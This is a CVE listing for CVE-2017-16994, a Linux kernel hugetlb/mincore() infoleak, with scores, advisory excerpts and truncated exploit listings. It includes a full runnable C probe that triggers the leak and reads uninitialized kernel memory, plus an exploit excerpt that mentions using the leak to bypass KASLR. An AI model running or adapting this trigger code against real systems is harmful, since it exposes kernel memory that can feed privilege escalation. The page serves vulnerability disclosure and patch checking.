CVSS v3 score: 5.5

CVE-2017-16994

Published: 27/11/2017 Updated: 25/04/2018
CVSS v2 Base Score: 2.1 | Impact Score: 2.9 | Exploitability Score: 3.9
CVSS v3 Base Score: 5.5 | Impact Score: 3.6 | Exploitability Score: 1.8
VMScore: 225
CVSS v2 Vector: AV:L/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

The walk_hugetlb_range() function in mm/pagewalk.c in the Linux kernel prior to 4.14.2 mishandles holes (non-present pages) in hugetlb ranges: the page-walk callbacks are only invoked for present pages, so do_mincore() never writes the vector entries for the missing pages and the caller receives whatever the kernel's scratch page already held. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call on an untouched MAP_HUGETLB mapping.
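The following is an added example (not code from this page, from the exploit listings below, or from the Project Zero report) that turns the summary above into a runnable check: it maps one huge page, never touches it, and calls mincore() on it. The kernel only ever writes 0 or 1 into a mincore() vector entry, so for a mapping with no resident pages a patched kernel (4.14.2 and later) returns all zeros, while a vulnerable one leaves the bytes as uninitialized scratch-page contents. Assumptions: x86-64 Linux with 2 MiB huge pages and 4 KiB base pages; the names probe_hugetlb_mincore, count_invalid_entries and count_nonzero_entries and the two sample vectors are this example's own constructions.

```c
/* Added example: probe for CVE-2017-16994 via mincore() on an untouched
 * hugetlb mapping. Assumes x86-64 Linux, 2 MiB huge pages, 4 KiB base pages. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define HUGE_SZ (2UL * 1024 * 1024)   /* assumed huge page size */
#define PAGE_SZ 4096UL                /* mincore() reports one byte per base page */
#define VEC_LEN (HUGE_SZ / PAGE_SZ)   /* 512 vector entries for one 2 MiB page */

/* Constructed sample vectors (not captured from a real kernel), used to
 * exercise the classifiers offline. */
const unsigned char sample_clean[8]  = {0, 1, 0, 0, 1, 1, 0, 0};
const unsigned char sample_leaked[8] = {0x48, 0x89, 0xe5, 0, 1, 0x2a, 0, 0xff};

/* The kernel only ever stores 0 or 1 in a mincore() vector entry. Any entry
 * with other bits set can only have come from memory the kernel never wrote. */
size_t count_invalid_entries(const unsigned char *vec, size_t n) {
    size_t bad = 0;
    for (size_t i = 0; i < n; i++)
        if (vec[i] & ~1u)
            bad++;
    return bad;
}

/* For a mapping that was never faulted in, every entry must be 0 ("not
 * resident"). A patched kernel reports the holes through pte_hole and writes
 * zeros; a vulnerable one leaves scratch-page contents behind. */
size_t count_nonzero_entries(const unsigned char *vec, size_t n) {
    size_t nz = 0;
    for (size_t i = 0; i < n; i++)
        if (vec[i])
            nz++;
    return nz;
}

/* Returns 1 if the kernel looks vulnerable, 0 if it looks fixed, and -1 if the
 * probe could not run (no huge page support, mmap() or mincore() failed). */
int probe_hugetlb_mincore(void) {
    unsigned char vec[VEC_LEN];
    /* MAP_NORESERVE avoids failing at mmap() time when no huge pages are
     * reserved; the pages are deliberately never touched, so there are no
     * present PTEs and, on a vulnerable kernel, no walk callbacks. */
    void *map = mmap(NULL, HUGE_SZ, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE,
                     -1, 0);
    if (map == MAP_FAILED)
        return -1;
    /* Sentinel: do_mincore() copies the whole scratch page into vec, so a fixed
     * kernel overwrites this with zeros; if it survives, mincore() wrote nothing. */
    memset(vec, 0xAA, sizeof vec);
    int rc = mincore(map, HUGE_SZ, vec);
    int saved_errno = errno;
    munmap(map, HUGE_SZ);
    if (rc != 0) {
        errno = saved_errno;
        return -1;
    }
    return count_nonzero_entries(vec, sizeof vec) ? 1 : 0;
}

int main(void) {
    int r = probe_hugetlb_mincore();
    if (r < 0)
        printf("probe skipped: %s (are huge pages available?)\n", strerror(errno));
    else
        printf("kernel looks %s\n", r ? "VULNERABLE (non-zero bytes for non-resident pages)"
                                       : "fixed (all entries zero)");
    return 0;
}
```

Run it as an unprivileged user; MAP_HUGETLB does not need capabilities, but the kernel must have CONFIG_HUGETLBFS and the architecture's default huge page size must be 2 MiB for the sizes above to hold. A non-zero result is only meaningful on a kernel older than 4.14.2 (or a distribution kernel without the backported fix); on a fixed kernel the whole vector comes back zeroed because walk_hugetlb_range() now reports the holes.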

Vulnerable Products

Linux kernel (linux)

Vendor Advisories

Synopsis: Important: kernel-alt security and bug fix update. Type/Severity: Security Advisory: Important. Topic: An update for kernel-alt is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System ...
A flaw was found in the patches used to fix the 'dirtycow' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages (CVE-2017-1000405). Linux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerab ...
Several security issues were fixed in the Linux kernel ...
The walk_hugetlb_range() function in the 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call ...

Exploits

/* * The source is modified from * bugs.chromium.org/p/project-zero/issues/detail?id=1431 * I try to find out information useful from the infoleak * The kernel address can be easily found out from the uninitialized memory * leaked from kernel, which can help bypass kaslr */ #define _GNU_SOURCE #include <unistd.h> #include <s ...
/** disable_map_min_add.c **/ /* * */ #include <stdio.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <stdlib.h> #include <sys/resource.h> #include <syscall.h> /* offsets might differ, kernel was custom compiled * you can read vmlinux and calculate the offset when testing * ...
/* Source: bugs.chromium.org/p/project-zero/issues/detail?id=1431 I found the following bug with an AFL-based fuzzer: When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range pass ...